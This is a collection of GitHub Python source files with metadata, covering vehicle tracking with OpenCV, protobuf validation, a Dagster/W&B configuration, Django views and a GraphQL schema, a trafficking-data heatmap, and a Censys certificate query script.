new_cars = []\r\n # read new detected objects\r\n for (x, y, w, h) in cars:\r\n new_cars.append(detected_object(x, y, w, h, \"Vehicle TBD\"))\r\n\r\n for element in range(len(all_cars)):\r\n all_cars[element].draw = False\r\n\r\n if not init and len(cars) > 0:\r\n for element in new_cars:\r\n element.label = str(id_vehicle)\r\n id_vehicle += 1\r\n all_cars = new_cars.copy()\r\n init = True\r\n\r\n elif init:\r\n # delete elements with no TTL left and decrements TTL\r\n for element in range(len(all_cars)):\r\n # todel = []\r\n if all_cars[element].TTL <= 0:\r\n all_cars[element].draw = False\r\n else:\r\n all_cars[element].TTL -= 1\r\n all_cars[element].draw = False\r\n # Determin object correspendence\r\n # compute xxo as [a,b] where a is the index of the new object in new_cars and o is the index of the object in all_cars\r\n if init and len(new_cars) > 0:\r\n xxo = []\r\n for new_element in range(len(new_cars)):\r\n distance = []\r\n distance_indexes = []\r\n for old_element in range(len(all_cars)):\r\n distance.append(new_cars[new_element].distance(\r\n all_cars[old_element]))\r\n distance_indexes.append([new_element, old_element])\r\n xxo.append(distance_indexes[np.argmin(distance)])\r\n # Same thing as precedent , but this time we inverse the loop\r\n oxo = []\r\n for old_element in range(len(all_cars)):\r\n distance = []\r\n distance_indexes = []\r\n for new_element in range(len(new_cars)):\r\n distance.append(all_cars[old_element].distance(\r\n new_cars[new_element]))\r\n distance_indexes.append([new_element, old_element])\r\n oxo.append(distance_indexes[np.argmin(distance)])\r\n # now we search for the intersection of xxo and oxo :\r\n # 1- if an element is common , the we update it's position in all_cars\r\n # 2 - if an element belongs only to xxo , then it's a new element\r\n # 3 - if an element belongs onlt to oxo , then we don't render it\r\n only_x, common, only_o = foofunction(xxo, oxo)\r\n # case 1 :\r\n for common_element in common:\r\n all_cars[common_element[1]].TTL = 5\r\n all_cars[common_element[1]].x = new_cars[common_element[0]].x\r\n all_cars[common_element[1]].y = new_cars[common_element[0]].y\r\n all_cars[common_element[1]\r\n ].centroid = new_cars[common_element[0]].centroid\r\n all_cars[common_element[1]].draw = True\r\n # case 2 :\r\n for only_x_element in only_x:\r\n new_cars[only_x_element[0]].label = str(id_vehicle)\r\n new_cars[only_x_element[0]].draw = True\r\n id_vehicle += 1\r\n all_cars = list(all_cars)\r\n all_cars.append(new_cars[only_x_element[0]])\r\n # case 3 :\r\n for only_o_element in only_o:\r\n all_cars[only_o_element[1]].x = 9999\r\n all_cars[only_o_element[1]].y = 9999\r\n all_cars[only_o_element[1]].centroid = (9999, 9999)\r\n all_cars[only_o_element[1]].draw = False\r\n\r\n showdown = all_cars\r\n for element in showdown:\r\n element.history.append(element.centroid)\r\n print(element.history)\r\n if element.draw:\r\n startpoint = element.history[0]\r\n endpoint = element.history[-1]\r\n vector = (endpoint[0]-startpoint[0], endpoint[1]-startpoint[1])\r\n enddraw = (element.centroid[0]+vector[0],\r\n element.centroid[1]+vector[1])\r\n cv2.rectangle(img, (element.x, element.y), (element.x +\r\n element.w, element.y+element.h), (0, 0, 255), 2)\r\n cv2.putText(img, element.label, (element.x, element.y+element.h+50),\r\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2, cv2.LINE_AA)\r\n try:\r\n cv2.arrowedLine(img, element.centroid, enddraw, (255, 0, 0), 2)\r\n except:\r\n pass\r\n for i in element.history:\r\n cv2.circle(img, i, 2, (0, 255, 255), -1)\r\n cv2.imshow(\"CAR TRACKING\", img)\r\n time.sleep(0.01)\r\n frame_counter += 1\r\n # Stop if 'q' key is pressed\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n", "repo_name": "nazimbandoui/car_tracking", "sub_path": "track.py", "file_name": "track.py", "file_ext": "py", "file_size_in_byte": 5552, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.all", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.CascadeClassifier", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 50, "usage_type": "attribute"}, {"api_name": "numpy.argmin", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 97, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 135, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 137, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 138, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 138, "usage_type": "attribute"}, {"api_name": "cv2.arrowedLine", "line_number": 140, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 144, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 145, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 146, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 149, "usage_type": "call"}]}
+{"seq_id": "37864710275", "text": "import base64\nimport math\nfrom importlib import import_module\n\nfrom google.protobuf import descriptor\nfrom google.protobuf.json_format import (_FLOAT_TYPES, _INFINITY, _INT64_TYPES,\n _NAN, _NEG_INFINITY, Parse)\n\n\ndef validate_protobuf(dataset_path, message):\n \"\"\"Check if a protobuf file is DGP compliant. Throws exceptions if invalid.\n\n Parameters\n ----------\n dataset_path: string\n Path to the dataset file (.json) to be validated.\n message: string\n Target message name to be validated (dgp.proto.dataset.Dataset).\n \"\"\"\n modules = message.split('.')\n assert len(modules) >= 4, '{} needs to be at least 4-tuple valued'.format(message)\n try:\n top_module = modules[0]\n proto, message_name = modules[-2], modules[-1]\n compiled_proto_module = '{}_pb2'.format(proto)\n module_object = import_module(\"{}.{}\".format('.'.join(modules[:-2]), compiled_proto_module))\n target_message = getattr(module_object, message_name)\n except Exception as e:\n raise ValueError('Failed to parse {} proto message: {}'.format(message, e.message))\n\n if not dataset_path.endswith((\".json\", \".pb\", \".prb\")):\n raise IOError(\"{} is not a supported file format. Supported file extenstions: .json, .pb, .prb\")\n\n is_json = dataset_path.endswith(\".json\")\n with open(dataset_path, \"r\" if is_json else \"rb\") as dataset_file:\n if is_json:\n message = Parse(dataset_file.read(), target_message())\n else:\n message = target_message()\n target_message().ParseFromString(dataset_file.read())\n\n schema = getattr('{}.validation', top_module, 'SCHEMA_VALIDATION')\n validate_message(message, schema)\n\n print(\"{} is valid\".format(dataset_path))\n\n\ndef validate_message(message, schema):\n \"\"\"Validate a protobuf message instance. Throws exception if a field value does not match the schema.\n Parameters\n ----------\n message: protobuf message instance\n The protocol buffers message instance to be validated.\n schema: dict\n A dictionary containing field names to NamedTuples of content schema.\n \"\"\"\n for field, value in message.ListFields():\n if _is_map_entry(field):\n v_field = field.message_type.fields_by_name['value']\n for key in value:\n _validate_field(v_field, value[key], schema)\n elif field.label == descriptor.FieldDescriptor.LABEL_REPEATED:\n for v in value:\n _validate_field(field, v, schema)\n else:\n _validate_field(field, value, schema)\n\n\ndef _is_map_entry(field):\n \"\"\"Returns True if the field is a map entry, vice versa.\n Parameters\n ----------\n field: FieldDescriptor\n Field.\n\n Returns\n -------\n exists: bool\n True if the filed is a map entry.\n \"\"\"\n return (\n field.type == descriptor.FieldDescriptor.TYPE_MESSAGE and field.message_type.has_options\n and field.message_type.GetOptions().map_entry\n )\n\n\ndef _validate_content(full_name, content, name_to_schema):\n \"\"\"Validate a single field content if the field name is in the auxiliary schema.\n Parameters\n ----------\n full_name: str\n Full name of the field.\n content: Any\n Field value.\n \"\"\"\n if full_name in name_to_schema:\n schema = name_to_schema[full_name]\n schema.validate(full_name, content)\n\n\ndef _validate_field(field, value, schema):\n \"\"\"Traverse fields, convert field value and call _validate_content to check\n if contents satisfy the auxiliary schema.\n Parameters\n ----------\n field: FieldDescriptor\n Field.\n value: Any\n Value.\n schema: Dict\n Auxiliary content schema imported from dgp.proto.auxiliary_schema\n \"\"\"\n if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:\n return validate_message(value, schema)\n\n field_value = value\n if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_ENUM:\n enum_value = field.enum_type.values_by_number.get(value, None)\n if enum_value is not None:\n field_value = enum_value.name\n elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_STRING:\n if field.type == descriptor.FieldDescriptor.TYPE_BYTES:\n field_value = base64.b64encode(value).decode('utf-8')\n else:\n field_value = value\n elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_BOOL:\n field_value = bool(value)\n elif field.cpp_type in _INT64_TYPES:\n field_value = str(value)\n elif field.cpp_type in _FLOAT_TYPES:\n if math.isinf(value):\n field_value = _NEG_INFINITY if value < 0.0 else _INFINITY\n if math.isnan(value):\n field_value = _NAN\n\n _validate_content(field.full_name, field_value, schema)\n", "repo_name": "morsingher/sfm_to_mvs", "sub_path": "ddad/dgp/utils/validator.py", "file_name": "validator.py", "file_ext": "py", "file_size_in_byte": 4862, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "53", "api": [{"api_name": "importlib.import_module", "line_number": 26, "usage_type": "call"}, {"api_name": "google.protobuf.json_format.Parse", "line_number": 37, "usage_type": "call"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 62, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 62, "usage_type": "name"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 82, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 82, "usage_type": "name"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 113, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 113, "usage_type": "name"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 117, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 117, "usage_type": "name"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 121, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 121, "usage_type": "name"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 122, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 122, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 123, "usage_type": "call"}, {"api_name": "google.protobuf.descriptor.FieldDescriptor", "line_number": 126, "usage_type": "attribute"}, {"api_name": "google.protobuf.descriptor", "line_number": 126, "usage_type": "name"}, {"api_name": "google.protobuf.json_format._INT64_TYPES", "line_number": 128, "usage_type": "name"}, {"api_name": "google.protobuf.json_format._FLOAT_TYPES", "line_number": 130, "usage_type": "name"}, {"api_name": "math.isinf", "line_number": 131, "usage_type": "call"}, {"api_name": "google.protobuf.json_format._NEG_INFINITY", "line_number": 132, "usage_type": "name"}, {"api_name": "google.protobuf.json_format._INFINITY", "line_number": 132, "usage_type": "name"}, {"api_name": "math.isnan", "line_number": 133, "usage_type": "call"}, {"api_name": "google.protobuf.json_format._NAN", "line_number": 134, "usage_type": "name"}]}
+{"seq_id": "9881877677", "text": "from dagster import (\n Definitions,\n StringSource,\n load_assets_from_package_module,\n make_values_resource,\n)\nfrom dagster_wandb import wandb_artifacts_io_manager, wandb_resource\n\nfrom . import assets\nfrom .ops.launch.run_launch_agent import run_launch_agent_example\nfrom .ops.launch.run_launch_job import run_launch_job_example\nfrom .ops.partitioned_job import partitioned_job_example\nfrom .ops.simple_job import simple_job_example\n\nwandb_config = make_values_resource(\n entity=StringSource,\n project=StringSource,\n)\n\ndefs = Definitions(\n assets=load_assets_from_package_module(assets),\n jobs=[\n simple_job_example,\n partitioned_job_example,\n run_launch_agent_example,\n run_launch_job_example,\n ],\n resources={\n \"wandb_config\": wandb_config.configured(\n {\n \"entity\": {\"env\": \"WANDB_ENTITY\"},\n \"project\": {\"env\": \"WANDB_PROJECT\"},\n }\n ),\n \"wandb_resource\": wandb_resource.configured({\"api_key\": {\"env\": \"WANDB_API_KEY\"}}),\n \"io_manager\": wandb_artifacts_io_manager.configured({\"cache_duration_in_minutes\": 60}),\n },\n)\n", "repo_name": "dagster-io/dagster", "sub_path": "examples/with_wandb/with_wandb/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 1159, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8986, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dagster.make_values_resource", "line_number": 15, "usage_type": "call"}, {"api_name": "dagster.StringSource", "line_number": 16, "usage_type": "name"}, {"api_name": "dagster.StringSource", "line_number": 17, "usage_type": "name"}, {"api_name": "dagster.Definitions", "line_number": 20, "usage_type": "call"}, {"api_name": "dagster.load_assets_from_package_module", "line_number": 21, "usage_type": "call"}, {"api_name": "ops.simple_job.simple_job_example", "line_number": 23, "usage_type": "name"}, {"api_name": "ops.partitioned_job.partitioned_job_example", "line_number": 24, "usage_type": "name"}, {"api_name": "ops.launch.run_launch_agent.run_launch_agent_example", "line_number": 25, "usage_type": "name"}, {"api_name": "ops.launch.run_launch_job.run_launch_job_example", "line_number": 26, "usage_type": "name"}, {"api_name": "dagster_wandb.wandb_resource.configured", "line_number": 35, "usage_type": "call"}, {"api_name": "dagster_wandb.wandb_resource", "line_number": 35, "usage_type": "name"}, {"api_name": "dagster_wandb.wandb_artifacts_io_manager.configured", "line_number": 36, "usage_type": "call"}, {"api_name": "dagster_wandb.wandb_artifacts_io_manager", "line_number": 36, "usage_type": "name"}]}
+{"seq_id": "14206480497", "text": "#encoding=utf-8\n\nfrom django.shortcuts import render\nfrom blogs.models import Tag, Category, BaseModel\nfrom common.helpers import paged_items, ok_json\nfrom common.pc_m import judge_pc_or_mobile\nfrom tools.models import Tools\n\n\ndef tools(request):\n nav_bar = \"tools\"\n tools_list = Tools.objects.filter(is_active=True).order_by(\"-id\")\n user_agt = judge_pc_or_mobile(request.META.get(\"HTTP_USER_AGENT\"))\n if user_agt is False:\n tools_list = paged_items(request, tools_list)\n return render(request, 'web/pages/tools/tools.html', locals())\n else:\n tools_list = paged_items(request, tools_list)\n return render(request, 'web/pages/tools/tools.html', locals())\n\n\ndef tools_detail(request, tid):\n nav_bar = \"tools\"\n tool_detail = Tools.objects.filter(id=tid).first()\n tool_detail.views += 1\n tool_detail.save()\n user_agt = judge_pc_or_mobile(request.META.get(\"HTTP_USER_AGENT\"))\n if user_agt is False:\n return render(request, 'web/pages/tools/tools_detail.html', locals())\n else:\n return render(request, 'web/pages/tools/tools_detail.html', locals())", "repo_name": "gingernet/scoinfamily", "sub_path": "tools/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1119, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tools.models.Tools.objects.filter", "line_number": 12, "usage_type": "call"}, {"api_name": "tools.models.Tools.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "tools.models.Tools", "line_number": 12, "usage_type": "name"}, {"api_name": "common.pc_m.judge_pc_or_mobile", "line_number": 13, "usage_type": "call"}, {"api_name": "common.helpers.paged_items", "line_number": 15, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}, {"api_name": "common.helpers.paged_items", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 19, "usage_type": "call"}, {"api_name": "tools.models.Tools.objects.filter", "line_number": 24, "usage_type": "call"}, {"api_name": "tools.models.Tools.objects", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tools.models.Tools", "line_number": 24, "usage_type": "name"}, {"api_name": "common.pc_m.judge_pc_or_mobile", "line_number": 27, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 29, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 31, "usage_type": "call"}]}
+{"seq_id": "38768996814", "text": "import pandas as pd\r\nimport numpy as np\r\nimport pyarrow.feather as feather\r\nimport plotly.express as pl\r\nimport plotly.graph_objects as go\r\n\r\n# creates a new df to change df_ht ISO2 to ISO3 for plotly\r\niso_data = pd.read_feather(r\"C:\\DataSci\\Projects\\Data Practice\\ht_region_lookup.ft\")\r\niso_data = iso_data[['ISO2', 'ISO3']]\r\n# converts df to dict for easy replace function\r\niso_dict = dict(iso_data.values)\r\n\r\n# creates new df_ht\r\ndf_ht = pd.read_feather(r\"C:\\DataSci\\Projects\\Data Practice\\ht.ft\")\r\n# replaces ISO2 to ISO3 for citizenship\r\ndf_ht = df_ht.replace({\"citizenship\": iso_dict})\r\n\r\nbool_names = [ 'majorityStatusAtExploit', 'majorityEntry', 'meansOfControlDebtBondage', \r\n 'meansOfControlTakesEarnings', 'meansOfControlRestrictsFinancialAccess', 'meansOfControlThreats', 'meansOfControlPsychologicalAbuse', 'meansOfControlPhysicalAbuse', \r\n 'meansOfControlSexualAbuse', 'meansOfControlFalsePromises', 'meansOfControlPsychoactiveSubstances', 'meansOfControlRestrictsMovement', \r\n 'meansOfControlRestrictsMedicalCare', 'meansOfControlExcessiveWorkingHours', 'meansOfControlUsesChildren', 'meansOfControlThreatOfLawEnforcement', \r\n 'meansOfControlWithholdsNecessities', 'meansOfControlWithholdsDocuments', 'meansOfControlOther', 'meansOfControlNotSpecified', \r\n 'isForcedLabour', 'isSexualExploit', 'isOtherExploit', 'isSexAndLabour', 'isForcedMarriage', 'isForcedMilitary', 'isOrganRemoval', 'isSlaveryAndPractices', \r\n 'typeOfLabourAgriculture', 'typeOfLabourAquafarming', 'typeOfLabourBegging', 'typeOfLabourConstruction', 'typeOfLabourDomesticWork', \r\n 'typeOfLabourHospitality', 'typeOfLabourIllicitActivities', 'typeOfLabourManufacturing', 'typeOfLabourMiningOrDrilling', 'typeOfLabourPeddling', \r\n 'typeOfLabourTransportation', 'typeOfLabourOther', 'typeOfLabourNotSpecified', 'typeOfSexProstitution', 'typeOfSexPornography', \r\n 'typeOfSexRemoteInteractiveServices', 'typeOfSexPrivateSexualServices', 'isAbduction', 'recruiterRelationIntimatePartner', \r\n 'recruiterRelationFriend', 'recruiterRelationFamily', 'recruiterRelationOther', 'recruiterRelationUnknown']\r\ncol_categ = ['Datasource', 'gender', 'ageBroad', 'majorityStatus', 'citizenship','yearOfRegistration','RecruiterRelationship', 'CountryOfExploitation', ]\r\ncitizenship= ([])\r\ndrop_col = ['gender', 'ageBroad', 'typeOfExploitConcatenated', 'meansOfControlConcatenated', 'typeOfLabourConcatenated', 'typeOfSexConcatenated']\r\n\r\n\r\ndef main():\r\n \"\"\"main function\"\"\"\r\n # change last two parameters to change what years you want to look between\r\n # leave last one blank for just one year\r\n make_df_year(df_ht, 2002, 2021)\r\n\r\ndef make_map(df, year:str):\r\n \"\"\"Given dataframe ir will make the world heat map\"\"\"\r\n # creates figure\r\n fig = go.Figure(data=go.Choropleth(locations = df['citizenship'], z = df['Count'], colorscale='Inferno', autocolorscale=True))\r\n # changes title\r\n fig.update_layout(title={'text':f'Human-Trafficking Heatmap based on victims citizenship for {year}'})\r\n fig.show()\r\n return\r\n\r\ndef make_df_year(df, start_y, ending_y = 0):\r\n \"\"\"Given the year it will make a dataframe with only the given year\"\"\"\r\n years = []\r\n # make list of available years to check the input is correct\r\n for year in np.sort(df['yearOfRegistration'].unique()):\r\n years.append(year)\r\n # print(f'years list: {years}')\r\n # check if only one year\r\n if ending_y == 0:\r\n if start_y in years:\r\n year_df = df.loc[df['yearOfRegistration'] == start_y]\r\n year_df = year_df.groupby(['citizenship'])['citizenship'].count().reset_index(name='Count')\r\n make_map(year_df, str(start_y))\r\n return\r\n else:\r\n print(\"Can't\")\r\n # between years\r\n else:\r\n if start_y in years and ending_y in years:\r\n year_df = df[df['yearOfRegistration'].between(start_y, ending_y)]\r\n year_df = year_df.groupby(['citizenship'])['citizenship'].count().reset_index(name='Count')\r\n make_map(year_df, f'{start_y} to {ending_y}')\r\n return\r\n else:\r\n print(\"Can't\")\r\n\r\nmain()", "repo_name": "cmonitt/Human_Trafficking", "sub_path": "human_trafficking.py", "file_name": "human_trafficking.py", "file_ext": "py", "file_size_in_byte": 4265, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_feather", "line_number": 8, "usage_type": "call"}, {"api_name": "pandas.read_feather", "line_number": 14, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 43, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 43, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Choropleth", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 53, "usage_type": "call"}]}
+{"seq_id": "16839175316", "text": "from censys.search import CensysCertificates\nimport datetime\nimport csv\n\n\nc = CensysCertificates()\n\nnow = datetime.datetime.now()\n\nfields_to_retrieve = [\n \"parsed.subject_dn\",\n \"parsed.names\",\n \"parsed.subject.common_name\",\n \"parsed.fingerprint_sha256\",\n \"parsed.validity.start\",\n \"parsed.validity.end\",\n]\n\n\ncertificate_list = []\nheader = [\"SHA256 fingerprint\", \"Validity Start\", \"Validity End\"]\n\n\ndef create_csv():\n with open('censys.csv', 'w', encoding='UTF8', newline=\"\") as f:\n writer = csv.writer(f)\n writer.writerow(header)\n for certificate in certificate_list:\n writer.writerow(certificate)\n\n\ndef censys_certificates():\n for page in c.search(\"parsed.names: censys.io and tags: trusted\", fields_to_retrieve):\n subject_dn = page[\"parsed.subject_dn\"]\n names = page[\"parsed.names\"]\n validity_start = page[\"parsed.validity.start\"]\n validity_end = page[\"parsed.validity.end\"]\n sha256 = page[\"parsed.fingerprint_sha256\"]\n \n censys_domain_flag = 0\n\n if \"censys.io\".lower() in subject_dn.lower():\n censys_domain_flag = 1\n else:\n for name in names:\n if \"censys.io\".lower() in name.lower():\n censys_domain_flag = 1\n break\n \n validity_end_dt = datetime.datetime.strptime(validity_end, \"%Y-%m-%dT%H:%M:%SZ\")\n\n\n if censys_domain_flag and validity_end_dt >= now:\n certificate_list.append([sha256, str(validity_start), str(validity_end)])\n\n\n\nif __name__ == \"__main__\":\n censys_certificates()\n create_csv()", "repo_name": "SaiVikhyath/Censys-Project", "sub_path": "censys_project.py", "file_name": "censys_project.py", "file_ext": "py", "file_size_in_byte": 1628, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "censys.search.CensysCertificates", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 8, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 8, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 50, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 50, "usage_type": "attribute"}]}
+{"seq_id": "31977930526", "text": "import graphene\nfrom .types import BlogType\nfrom .models import Blog\nfrom users.models import CustomUser as User\nimport json\n\nclass BlogQuery(graphene.ObjectType):\n blogs = graphene.List(BlogType)\n blog = graphene.Field(BlogType, id=graphene.ID(required=True))\n user_blogs = graphene.List(BlogType, id=graphene.ID(required=True))\n\n def resolve_blogs(parent, info):\n return Blog.objects.all()\n \n def resolve_blog(parent, info, id):\n return Blog.objects.get(pk=id)\n\n def resolve_user_blogs(parent, info, id):\n author = User.objects.get(pk=id)\n return Blog.objects.filter(author=author)\n \nclass CreateBlogMutation(graphene.Mutation):\n class Arguments:\n title = graphene.String(required=True)\n data = graphene.String(required=True)\n tags = graphene.List(graphene.String)\n more_info = graphene.JSONString()\n \n blog = graphene.Field(BlogType)\n\n @classmethod\n def mutate(cls, root, info, title, data, tags, more_info):\n user = info.context.user\n if(user.is_authenticated):\n author = User.objects.get(pk=user.id)\n blog = Blog(author=author, title=title, data=data, tags=tags, more_info=more_info)\n blog.save()\n return CreateBlogMutation(blog=blog)\n\n raise Exception(\"You need to login to access the api\")\n\nclass UpdateBlogMutation(graphene.Mutation):\n class Arguments:\n id = graphene.ID(required=True)\n title = graphene.String(required=False)\n data = graphene.String(required=False)\n tags = graphene.List(graphene.String, required=False)\n more_info = graphene.JSONString(required=False)\n \n blog = graphene.Field(BlogType)\n\n @classmethod\n def mutate(cls, root, info, id, title=None, data=None, tags=None, more_info=None):\n user = info.context.user\n\n if(user.is_authenticated):\n blog = Blog.objects.get(pk=id)\n \n if(blog.is_project_blog):\n raise Exception(\"This action is forbid on this endpoint.\")\n if(blog.author == user):\n if title is not None:\n blog.title = title\n \n if data is not None:\n blog.data = data\n\n if tags is not None:\n blog.tags = tags\n \n if more_info is not None:\n blog.more_info = more_info\n\n blog.save()\n return UpdateBlogMutation(blog=blog)\n raise Exception(\"You don't have permissions to perform this operation\")\n raise Exception(\"You have to be logged in to access api\")\n\nclass DeleteBlogMutation(graphene.Mutation):\n class Arguments:\n id = graphene.ID()\n \n response = graphene.JSONString()\n\n @classmethod\n def mutate(cls, root, info, id):\n user = info.context.user\n\n if(user.is_authenticated):\n blog = Blog.objects.get(pk=id)\n if(blog.is_project_blog):\n raise Exception(\"This action is forbid on this endpoint.\")\n if(blog.author == user):\n blog.delete()\n response = {\n \"success\": True,\n \"error\": False\n }\n return DeleteBlogMutation(response=json.dumps(response))\n raise Exception(\"You don't have permissions to perform this operation\")\n raise Exception(\"You have to logged in to access api\")\n", "repo_name": "sleepingsaint/project-scope", "sub_path": "blogs/schema.py", "file_name": "schema.py", "file_ext": "py", "file_size_in_byte": 3505, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "graphene.ObjectType", "line_number": 7, "usage_type": "attribute"}, {"api_name": "graphene.List", "line_number": 8, "usage_type": "call"}, {"api_name": "types.BlogType", "line_number": 8, "usage_type": "argument"}, {"api_name": "graphene.Field", "line_number": 9, "usage_type": "call"}, {"api_name": "types.BlogType", "line_number": 9, "usage_type": "argument"}, {"api_name": "graphene.ID", "line_number": 9, "usage_type": "call"}, {"api_name": "graphene.List", "line_number": 10, "usage_type": "call"}, {"api_name": "types.BlogType", "line_number": 10, "usage_type": "argument"}, {"api_name": "graphene.ID", "line_number": 10, "usage_type": "call"}, {"api_name": "models.Blog.objects.all", "line_number": 13, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 13, "usage_type": "name"}, {"api_name": "models.Blog.objects.get", "line_number": 16, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 16, "usage_type": "name"}, {"api_name": "users.models.CustomUser.objects.get", "line_number": 19, "usage_type": "call"}, {"api_name": "users.models.CustomUser.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "users.models.CustomUser", "line_number": 19, "usage_type": "name"}, {"api_name": "models.Blog.objects.filter", "line_number": 20, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 20, "usage_type": "name"}, {"api_name": "graphene.Mutation", "line_number": 22, "usage_type": "attribute"}, {"api_name": "graphene.String", "line_number": 24, "usage_type": "call"}, {"api_name": "graphene.String", "line_number": 25, "usage_type": "call"}, {"api_name": "graphene.List", "line_number": 26, "usage_type": "call"}, {"api_name": "graphene.String", "line_number": 26, "usage_type": "attribute"}, {"api_name": "graphene.JSONString", "line_number": 27, "usage_type": "call"}, {"api_name": "graphene.Field", "line_number": 29, "usage_type": "call"}, {"api_name": "types.BlogType", "line_number": 29, "usage_type": "argument"}, {"api_name": "users.models.CustomUser.objects.get", "line_number": 35, "usage_type": "call"}, {"api_name": "users.models.CustomUser.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "users.models.CustomUser", "line_number": 35, "usage_type": "name"}, {"api_name": "models.Blog", "line_number": 36, "usage_type": "call"}, {"api_name": "graphene.Mutation", "line_number": 42, "usage_type": "attribute"}, {"api_name": "graphene.ID", "line_number": 44, "usage_type": "call"}, {"api_name": "graphene.String", "line_number": 45, "usage_type": "call"}, {"api_name": "graphene.String", "line_number": 46, "usage_type": "call"}, {"api_name": "graphene.List", "line_number": 47, "usage_type": "call"}, {"api_name": "graphene.String", "line_number": 47, "usage_type": "attribute"}, {"api_name": "graphene.JSONString", "line_number": 48, "usage_type": "call"}, {"api_name": "graphene.Field", "line_number": 50, "usage_type": "call"}, {"api_name": "types.BlogType", "line_number": 50, "usage_type": "argument"}, {"api_name": "models.Blog.objects.get", "line_number": 57, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 57, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 57, "usage_type": "name"}, {"api_name": "graphene.Mutation", "line_number": 79, "usage_type": "attribute"}, {"api_name": "graphene.ID", "line_number": 81, "usage_type": "call"}, {"api_name": "graphene.JSONString", "line_number": 83, "usage_type": "call"}, {"api_name": "models.Blog.objects.get", "line_number": 90, "usage_type": "call"}, {"api_name": "models.Blog.objects", "line_number": 90, "usage_type": "attribute"}, {"api_name": "models.Blog", "line_number": 90, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 99, "usage_type": "call"}]}
